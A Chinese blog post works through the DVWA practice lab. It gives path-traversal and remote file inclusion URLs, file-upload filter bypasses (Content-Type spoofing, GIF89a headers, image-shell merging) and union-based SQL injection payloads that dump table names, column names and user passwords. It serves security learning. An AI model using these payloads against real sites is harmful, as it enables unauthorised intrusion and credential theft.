DVWA文件包含,上传,sql注入靶场

最新推荐文章于 2025-02-10 22:05:46 发布
最新推荐文章于 2025-02-10 22:05:46 发布
阅读量303 收藏 4
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iczfy585/article/details/103003358
版权

目录

文件包含

什么是文件包含?
在php中文件包含主要是指调用了include(); include_once(); require(); require_once()函数。这些函数能够将包含的文本当做php代码去执行,而不管该文本是不是以php为扩展名的。文件包含可以分为本地文件包含()和远程文件包含。区别在于远程文件包含需要将php.ini文件中的 allow_url_fopen设置为On(默认情况下是Off)。而要实现文件包含,需要将allow_url_include设置为On

一. 这里先区别一下上面四个和文件包含相关的函数:
1.include()和include_once():两者都可一包含一个文件,区别是include_once()会先检查所包含的文件中的代码是否已存在,若存在,这不会继续包含。
2.require()和require_once():和include()与include_once()类似,require_once()会检查代码是否已经存在,及只会包含一次。require()和include()的最大区别在于:对于包含一个不存在的文件,include()会给出一个警告并且继续执行下面的代码,而对于require()来说,会产生一个致命错误从而结束程序执行。

二. 重要的放在前面

  1. 对于本地文件包含的情况,可以通过目录遍历的方式去尝试读

二. 在来看看这个文件上传

先把难度调成low,代码如下:

  <?php
   // The page we wish to display
   $file = $_GET[ 'page' ];
   ?>

并没有对输入做出任何限制。

  1. 先看一下View Help中的要求:
    在这里插入图片描述
    让我们去读出…/hackable/flags/fi.php中的5句名言。观察一下url
    在这里插入图片描述
    里面的特征URL是/?page=file.php。是一种经典的查询字符串结构。原页面有file1~file3,我们尝试访问一下file4。/?page=file4.php结果显示是一个隐藏文件(貌似没啥用,但是在实际过程中得有这样枚举一下的意识)
    在这里插入图片描述
  2. 直奔主题,去读一下fi.php文件
    尝试访问/?page=../hackable/flags/fi.php
    在这里插入图片描述
    报出了错误,应该是目录结构的问题,但是我们从中得到了绝对路径,于是可以尝试直接读一下配置文件/?page=d:\wamp\www\dvwa\php.ini
    在这里插入图片描述
    可以看到是可以成功了的。
    再去尝试一下向上一级去读?page=../../hackable/flags/fi.php结果如下:
    在这里插入图片描述
    读到了几句Quote。
    远程文件包含:
    当allow_url_fopen为on时(allow_url_include也为on)是,就可以实现远程文件包含。我们在远程服务器上建一个phpinfo.txt的文本文档。用本机访问一下:
    在这里插入图片描述
    然后远程包含一下:/?page=http://192.168.56.145/phpinfo.txt,返回结果如下:
    在这里插入图片描述
    可以看到文本文档是被当做了php代码去执行了。

文件上传

文件上传作为一个web应用功能。若没有对文件的类型作严格的限制。则可能执行上传恶意的文本,getshell等操作。

low等级
low等级直接可以上传一个php文件。
shell.php

在这里插入图片描述

medium等级
可以查看一下Medium的源码,发现只是检查了文件类型
在这里插入图片描述
因此用burp抓包,修改http请求头中的content-type字段即可。
在这里插入图片描述
将Conten-Type字段的: application/octet-stream 改为 image/png
在这里插入图片描述
查看结果是上传成功了。
在这里插入图片描述

hight等级
查看high等级的源码
在这里插入图片描述
这里后缀名给了白名单,并且getimagesize()函数.

getimagesize()函数的原理:该函数会检测图片的16进制的前几个数是否符合图片的格式的。有两种方式的绕过:
1.直接在脚本文件前面加上GIF89a
2.合成图片马,在命令行中用: copy a.png/b shell.php/a b.png

这里理论上可以用%00截断来绕过后缀名检验,但是对php的版本要求是要小于5.3.4的,但是实验环境不支持,这里可以结合上面的文件包含的漏洞一起利用来getshell。
上传一个shell.php文件内容如下:

GIF89A
<?php  
phpinfo();
?>

上传后抓包,需要改掉后缀为png,(测试了一下也要改Content-Type字段)
在这里插入图片描述
结合文件包含漏洞访问一下这个png文件。
链接为:

http://localhost:8081/dvwa/vulnerabilities/fi/?page=d:\wamp\www\dvwa\hackable\uploads\shell.png

在这里插入图片描述

sql注入

sql注入的原理是未对前端传来的数据进行严格的过滤,导致数据被当做代码来执行了。
要实现sql注入需要两个条件:

  • 参数用户可控
  • 输入数据被带入到了数据库中去执行

low等级
1’ or ‘1’='1测试,返回了所有的数据,即可证明存在字符类型的注入,这里可以用联合注入的方式。(经测试字段数为2)。
查表名

0' union select 1,group_concat(table_name)from information_schema.tables where table_schema = database()#

在这里插入图片描述
查字段名

0' union select 1,group_concat(column_name)from information_schema.columns where table_name = "users"#

在这里插入图片描述

查数据

0' union select 1,group_concat(user,password) from users#

在这里插入图片描述
medium等级
medium利用下拉表来限制了输入,这种前端限制直接抓包来绕过就可以了。在这里插入图片描述
用burp抓包来修改,这里验证发现是数字型的,不用闭合单引号,直接利用联合注入就可以了。
在这里插入图片描述
后面的操作就是利用information_schema表来查数据表,查字段,查值就可以了。

high等级
hight等级点击后会弹出输入框,应该是防止自动注入工具的,这里用手工注入方式和low等级一样,直接闭合单引号用union注入就可以实现。
在这里插入图片描述

dvwa中的文件包含与文件上传
qq_45653152的博客
05-21 875
文件包含与文件上传 文件包含:程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含文件包含实验前必须将我们的PHP.ini中的allow_url_fopen和allow_url_include打开,即开启远程读取和本地包含。 Low等级: 查看源代码,从源码中可以看出,服务器对参数page并没有做任何的过滤操作 服务器期望用进行的操作是点击file1.php、file2.php、file3.php三个文件,服务器包含这三
DVWA文件包含与文件上传
qq_44252141的博客
06-23 457
文件包含 LOW 利用page=file1.php 修改page=file4.php/page=../../hackable/flags/fi.php Medium 首先利用../../发现被置空,修改使用..././发现同样被置空 尝试..\..\发现未被置空 page=..\..\hackable/flags/fi.php page=.\file4.php <?php // The page we wish to display $file = $_GE
DVWA操作手册(二)文件包含,文件上传SQL注入SQL盲注
qq_41945550的博客
08-06 707
2.4 File Inclusion 文件包含 2.4.1 low难度 源代码: <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 可以看到low等级没有做任何过滤。首先尝试一下包含一个不存在的文件。 通过返回结果可以看到已经把网站的绝对路径给爆出来了。 利用文件上传文件包含的组合拳来进行进一步操作。通过文件上传个图片马,然后通过文件包含执行该图片。 http://192.168.88.224/dvwa/vul
DVWA攻略-02-File 包含/上传
Xor0ne
07-15 609
文章目录4.File Inclusion原理分析4.1、low源码赏析start4.2、medium4.3、high4.4、Impossiable5.File Upload5.1、low5.2、medium5.3、high5.4、Impossiable 4.File Inclusion 参考文献: 文件包含漏洞 原理分析 File Inclusion,文件包含漏洞,目录遍历漏洞在国内外有许多不同的叫法,也可以叫做信息泄露漏洞、非授权文件包含漏洞等。 文件包含分类 LFI:本地文件包含(Local File
DVWA —— File Upload 文件上传
YouTheFreedom的博客
05-23 480
文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严或webserver相关解析漏洞未修复而造成的,如果文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,攻击者可通过 Web 访问的目录上传任意文件,包括网站后门文件(webshell),进而远程控制网站服务器。 攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
DVWA靶场SQL注入和布尔盲注练习
2301_80038718的博客
11-02 1084
(一个个爆出来):select first_name,last_name from users where user_id=‘1’ and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’ limit 0,1)));
DVWA靶场SQL注入
Tangyoo的博客
07-03 1491
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
DVWA靶场-SQL InjectionSQL注入
mlws1900的博客
03-18 681
就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。函数用于对用户输入的id进行转义,以防止恶意SQL代码被插入到SQL查询语句中。通过使用这个函数,特殊字符(如单引号)将被转义,从而使输入的数据变得安全,并且不会破坏SQL查询语句的结构。
DVWA靶场SQL注入实测笔记(小白自查)-LOW SECURITY
2401_83237906的博客
04-06 1170
所以联想到把0x7e换成database()是不是也能正常返回值,经过尝试,发现返回空,没报错都,所以这个0x7e不敢丢,直接加也不行,加逗号也不行(两个位置放3个参数),怎么合在一起,把两列变成一列?
DVWA靶场通关——SQL Injection篇
最新发布
m0_74824865的博客
02-10 1040
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题。
5、DVWA——文件上传
qq_55202378的博客
09-11 1442
DVWA 文件上传
DVWA 文件上传漏洞
QYbkx974的博客
11-16 1403
本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞。
DVWA靶场】文件上传
weixin_55205599的博客
09-03 265
使用hackerbar给data传参,可以看到php信息(传参就是phpinfo()可以显示php信息),已经getshell了。进入靶机metasploitable的/var/www/dvwa/hackable/uploads发现成功上传到服务器。可以查看源码,黑白盒结合,low级别未对文件上传做任何校验,可以上传 jsp、php、asp的可执行文件。可以看到直接访问上传路径是不行的,因为我们写的php代码中是带post参数的。直接上传文件,可以看到文件上传路径。打开中国菜刀,输入以下信息。
dvwa靶场之文件上传
m0_63314341的博客
02-12 2651
文件上传 指有一个漏洞可以让我们把我们的文件上传上去,通过这个漏洞我们可以上传一些木马 下面我们先分析一下low级别的源代码 第一个if确定我们的上传操作,之后$target_path函数确定我们上传文件的位置,获取我们文件的名字,如果没有移动文件到函数指定的位置则上传失败,否则上传成功 由于low级别没有进行任何的过滤所以我们可以随意上传 下面我们来看medium级别 这里他获取了我们上传文件的名字,类型,大小,如果我们上传的文件的类型不是jpeg,png并且我们上传的文件大小没有小于
DVWA靶场-File Upload 文件上传
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-05 1553
往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 DVWA靶场-File Inclusion 文件包含 靶场环境搭建 https://github.com/ethicalhack3r/DVWA [网络安全学习篇附]:DVWA 靶场搭建 目录 File Upload Low File Upload 核心代码 Medium File Upload 核心代码.
DVWA靶场-----FIle Upload(文件上传
m0_65712192的博客
11-14 4642
DVWA靶场-----FIle Upload(文件上传
DVWA靶场系列(四)—— File Upload(文件上传
qq_45612828的博客
07-12 6186
DVWA靶场系列(四)—— File Upload(文件上传
DVWA靶场练习(五)—— File Upload
liuzibo1024的博客
10-06 951
文件上传漏洞是指在Web应用中,由于对上传文件的类型、内容或文件名的验证不严格,导致攻击者可以上传恶意文件(如可执行文件、脚本等)到服务器,从而可能获取服务器的控制权限。这种漏洞的危害极大,因为攻击者可以上传WebShell等恶意脚本,直接控制服务器。本实验的目标是在服务器运行用户上传的php脚本。
SQL注入——文件上传
heyingcheng的博客
03-11 2777
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
DVWA靶场实战:SQL注入漏洞解析
DVWA(Damn Vulnerable Web Application)是一个流行的安全学习平台,它模拟了各种常见的Web应用程序漏洞,其中包括SQL注入SQL注入是黑客利用不安全的SQL语句在用户输入中插入恶意代码,以获取未经授权的数据或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值